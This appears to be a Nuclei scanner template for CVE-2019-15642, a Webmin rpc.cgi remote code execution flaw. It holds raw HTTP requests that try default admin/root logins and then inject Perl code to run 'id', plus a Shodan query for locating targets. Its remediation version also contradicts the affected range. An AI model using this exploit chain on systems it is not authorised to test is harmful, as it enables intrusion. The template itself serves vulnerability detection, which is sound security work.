id: CVE-2019-15642 info: name: Webmin < 1.920 - Authenticated Remote Code Execution author: pussycat0x severity: high description: | rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users." impact: | Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system. remediation: | Upgrade Webmin to version 1.920 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-15642 - https://github.com/jas502n/CVE-2019-15642 - https://doxfer.webmin.com/Webmin/Webmin_Servers_Index - https://github.com/webmin/webmin/blob/ab5e00e41ea1ecc1e24b8f8693f3495a0abb1aed/rpc.cgi#L26-L37 - https://github.com/webmin/webmin/commit/df8a43fb4bdc9c858874f72773bcba597ae9432c classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-15642 cwe-id: CWE-94 epss-score: 0.26994 epss-percentile: 0.96304 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: webmin product: webmin shodan-query: title:"Webmin" tags: cve,cve2019,webmin,rce variables: cmd: '`id`' http: - raw: - | POST /session_login.cgi HTTP/1.1 Host: {{Hostname}} Cookie: redirect=1; testing=1 Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}} Accept-Encoding: gzip, deflate user={{username}}&pass={{password}} - | POST /rpc.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1 Accept-Encoding: gzip, deflate OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n"; attack: pitchfork payloads: username: - admin - root password: - admin - root stop-at-first-match: true host-redirects: true matchers-condition: and matchers: - type: regex part: body_2 regex: - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)' - type: word part: body_2 words: - "Content-type: text/plain" - type: status status: - 200 # digest: 4a0a00473045022100c19ef8bcb5380cb1993256eb238a964fb6f038ab5784a2a8ebb7c6928a51fa5b02204b3e5c3aed1548bbde40091f25c47ef6067938f912660a135481b3c001fcec24:922c64590222798bb761d5b6d8e72950